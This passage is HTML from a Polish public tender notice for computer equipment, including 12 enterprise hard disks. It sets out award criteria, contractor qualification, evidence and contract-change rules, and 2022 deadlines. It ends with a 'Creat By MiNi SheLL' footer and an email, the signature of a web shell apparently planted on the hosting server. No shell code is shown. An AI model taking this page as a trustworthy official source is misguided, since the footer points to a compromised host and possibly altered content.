kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dyski twarde (12 szt.)<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Zgodność<br/>Zgodność z urządzeniem Synology RS2418RP+ wg „Lista zgodności produktów firmy Synology” (https://www.synology.com/pl-pl/compatibility) w klasie dysku „Enterprise”<br/>2<br/>Interfejs<br/>SATA 6 Gb/s<br/>3<br/>Prędkość obrotowa<br/>minimalnie 7200 obr./min<br/>4<br/>Pojemność<br/>minimalnie 10 TB<br/>5<br/>MTBF<br/>minimalnie 2 mln. godzin<br/>6<br/>Gwarancja producenta<br/>minimalnie 60 miesięcy<br/>7<br/>Format<br/>3,5 cala<br/>8<br/>Bufor danych<br/>minimalny 256 MB </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237400-3 - Akcesoria do wprowadzania danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej: (określenie warunków): Zamawiający wymaga należytego wykonania dostaw, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, polegających na dostawie co najmniej:<br/> • 2.4.1. tj. dla części I - dostawa sprzętu komputerowego o wartości co najmniej 200.000, 00 zł brutto (dwieście tysięcy złotych).<br/> • 2.4.2. tj. dla części II - dostawa sprzętu komputerowego o wartości co najmniej 100.000,00 zł brutto (sto tysięcy złotych). <br/> • 2.4.3 tj. dla części III - dostawa sprzętu komputerowego o wartości co najmniej 65.000,00 zł brutto (sześćdziesiąt pięć tysięcy złotych).<br/> • 2.4.4. tj. dla części IV – dostawa sprzętu komputerowego o wartości co najmniej 14.000, 00 zł brutto (czternaście tysięcy złotych).<br/> Ponadto dla części I, II, III, IV na potwierdzenie, że oferowane urządzenia dostarczone w ramach realizowanego zamówienia spełniają wymagania określone przez Zamawiającego, Wykonawca jest zobowiązany wraz z ofertą złożyć:<br/> a) kartę katalogową/karty katalogowe urządzeń lub <br/>b) opis techniczny urządzeń zawierające dane umożliwiające sprawdzenie parametrów tych urządzeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego<br/>wykazania braku podstaw wykluczenia określonych w niniejszej swz, na<br/>zamawiający żąda następujących dokumentów: 1) Podpisane oświadczenie, o braku podstaw do<br/>wykluczenia –według załączonego wzoru.Wykonawca, w przypadku polegania na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w<br/>pkt.1,także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu - według załączonego wzoru. W stosunku do Wykonawcy, którego oferta<br/>zostanie najwyżej oceniona, Zamawiający w celu potwierdzenia braku podstaw wykluczenia pobierze<br/>samodzielnie odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W przypadku gdy Wykonawca polega na<br/>zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>wart.125ust.1 ustawy pzp, - w odniesieniu do tych podmiotów Zamawiający pobierze samodzielnie<br/>dokument.Zamawiający pobierze samodzielnie dokument dotyczący podwykonawcy,któremu<br/>Wykonawca zamierza powierzyć wykonanie części zamówienia, a który nie jest podmiotem, na którego<br/>zdolnościach lub sytuacji wykonawca polega na zasadach określonych w art. 125 ust.1. W przypadku<br/>wspólnego ubiegania się o zamówienie –w odniesieniu do tych podmiotów Zamawiający pobierze<br/>samodzielnie dokument. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania po za granicami<br/>Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty<br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,potwierdzające<br/>odpowiednio, że :a)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej przepisach miejsca wszczęcia tej<br/>procedury. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed ich złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym – wzór oświadczenia stanowi załącznik nr 2 do SWZ,<br/>W przypadku gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca składa wraz z ofertą (za pośrednictwem miniPortalu) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – wzór oświadczenia stanowi załącznik nr 3 do SWZ. <br/> 2) wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączenie dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencji bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/> - Zakres referencji i innych dokumentów musi potwierdzać spełnianie odpowiednio warunku określonego w Rozdziale VII ust. 2 pkt 2.4. ppk. 2.4.1, 2.4.2, 2.4.3, 2.4.4 SWZ. -Wzór wykazu stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe UWAGA wraz z ofertą :<br/> • W przypadku dostarczania produktów: <br/> a) próbek, opisów lub fotografii dostarczonych produktów, których autentyczności musi zostać poświadczone przez Wykonawcę na żądanie Zamawiającego. <br/> Uwaga: dla części I, II, III, IV na potwierdzenie, że oferowane urządzenia dostarczone w ramach realizowanego zamówienia spełniają wymagania określone przez Zamawiającego, Wykonawca jest zobowiązany wraz z ofertą złożyć:<br/> a) kartę katalogową/karty katalogowe urządzeń <br/> lub <br/>b) opis techniczny urządzeń zawierające dane umożliwiające sprawdzenie parametrów tych urządzeń. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. Wezwanie Zamawiającego o uzupełnienie jest wezwaniem jednokrotnym w obrębie tego samego przedmiotowego środka dowodowego. Jeżeli braki w obrębie dokumentów przedmiotowych nie zostaną usunięte lub dokumenty przedmiotowe zawierają błędy, w tym nie potwierdzają okoliczności , jakich Zamawiający wymagał od dokumentu , oferta, do której załączone zostały takie dokumenty, podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 2 lit. c). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia(możliwość<br/>składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum, spółkę cywilną) wraz z<br/>ofertą wykonawcy zobowiązani są złożyć pełnomocnictwo do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.- nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Dokument musi zostać złożony<br/>pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. Dopuszczalne jest również złożenie kopii dokumentu elektronicznie poświadczonej<br/>przez notariusza.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają do<br/>oferty oświadczenie (za pośrednictwem mini Portalu), z którego wynika, które roboty<br/>budowlane,dostawy lub usługi wykonają poszczególni wykonawcy – wzór oświadczenia stanowi<br/>załącznik nr2 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym. 4.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są na wezwanie<br/>Zamawiającego,złożyć podmiotowe środki dowodowe, o których mowa w pkt. 6 niniejszego<br/>Rozdziału , przy czym podmiotowe środki dowodowe, o których mowa:a) w pkt. 6 ppkt 2) SWZ<br/>składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku b) w<br/>pkt. 6ppkt 1) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.Poleganie na zdolnościach podmiotów udostępniających zasoby.5. W przypadku<br/>gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu,polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca składa wraz z<br/>ofertą(za pośrednictwem miniPortalu) zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – wzór oświadczenia stanowi załącznik nr<br/>3do SWZ.Zobowiązanie podmiotu udostępniającego zasoby,ma potwierdzać, że stosunek<br/>łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do<br/>tych zasobów i określa w szczególności:1) zakres dostępnych wykonawcy zasobów podmiotu<br/>udostępniającego zasoby,2) sposób i okres udostępniania wykonawcy i wykorzystania przez<br/>niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,3) czy i w<br/>jakim zakresie podmiot udostępniający, na zdolnościach którego wykonawca polega w<br/>odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane<br/>zdolności dotyczą.Zobowiązanie podmiotu trzeciego należy złożyć wformie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lubpostaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Dokumenty, w tym zobowiązanie podpisuje<br/>podmiot, od którego te dokumenty pochodzą, chyba, że zostanie udzielone Wykonawcy<br/>pełnomocnictwo do podpisania takich dokumentów za podmiot trzeci/podwykonawcę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazana jest zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2. <br/>2. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy: <br/>a) zmiana terminu dostawy przedmiotu zamówienia powstałych z winy Zamawiającego, a spowodowanych okolicznościami, których nie mógł przewidzieć w chwili zawarcia umowy; <br/>b) zmiana warunków umowy w przypadku zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia Umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją warunków zamówienia, <br/>c) zmiana terminu dostawy oraz terminu lub zasad płatności na skutek wystąpienia przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy, <br/>d) zamiana elementów/ przedmiotu dostaw w stosunku do tych, które Wykonawca przyjął w ofercie, przy czym zmieniane elementy/ przedmioty nie mogą mieć parametrów technicznych gorszych niż pierwotnie zaoferowane, <br/>e) zmiana całkowitego wynagrodzenia określonego w § 7 ust. 1 Umowy w przypadku: <br/>- zmiany stawki podatku od towarów i usług o wartość wynikającą ze zmiany, <br/>- zmniejszenia ilości przedmiotów (o nie więcej niż 2 szt.) spowodowane okolicznościami, za które Zamawiający nie ponosi odpowiedzialności, w takim przypadku wynagrodzenie rozliczone zostanie zgodnie z ilością dostarczonych przedmiotów, <br/> f) zmiany zapisów umowy, które nie są istotne. <br/> 3. Niezależnie od postanowień wyżej wymienionych zmiana umowy jest dopuszczalna również w innych przypadkach i na zasadach, o których mowa w art. 455 ust 1 pkt. 2-4 i ust. 2 ustawy PZP. <br/>4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-06 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com